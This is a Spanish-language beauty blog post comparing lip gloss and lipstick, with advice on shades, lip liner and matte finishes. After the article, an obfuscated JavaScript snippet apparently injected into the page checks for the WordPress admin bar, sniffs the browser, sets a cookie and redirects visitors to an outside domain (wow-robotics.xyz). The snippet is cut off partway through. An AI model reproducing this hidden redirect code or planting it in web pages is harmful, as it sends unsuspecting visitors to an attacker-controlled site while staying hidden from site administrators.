A menudo tenemos dudas de si usar una barra de labios o un lip gloss para complementar nuestro look. Podemos  mezclarlos y aplicar nuestra barra de labios habitual y luego un brillo encima para obtener una boca radiante.

GLOSS DE LABIOS

El lip gloss o brillo de labios, también da color a tus labios, pero de una forma más natural, dando ese aspecto jugoso a nuestra boca. Asimismo, aporta volumen y sensación de una boca pulposa y mojada y suelen tener una menor duración. Algunos son muy pegajosos y no dejan una sensación de confort en tu boca.

Los tonos más pálidos, texturas nacaradas y colores pastel, como los rosas suaves, corales o beige… están indicados para chicas más jóvenes que quieren mostrar un estilo más juvenil. Los tonos  más intensos como el fucsia, mandarina y marrón chocolate nos harán parecer más atrevidas y sofisticadas y aportarán un mayor dramatismo a nuestro estilo.

BARRAS DE LABIOS

Si quieres optar por un color intenso que permanezca inalterable todo el día, prueba con una barra de labios permanente. Si quieres que el color aguante más, utiliza un lápiz delineador y rellena tus labios hasta que no queden espacios en blanco; luego usa unos polvos traslúcidos encima y, por último, aplica el color de la barra. Si quieres retocar el contorno de tu boca, realiza pequeñas trazadas con el mismo lápiz delineador de labios alrededor.

También puedes probar con una barra de labios en textura mate. Tus labios se mostrarán más cálidos. Prueba un tono escarlata, un berenjena o un fucsia radiante que focalice la atención en tus labios. Si quieres mostrar una apariencia de femme fatal, el rojo nunca falla.

¡Procura siempre tener tus labios hidratados, para mostrarlos suaves y cuidados!

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone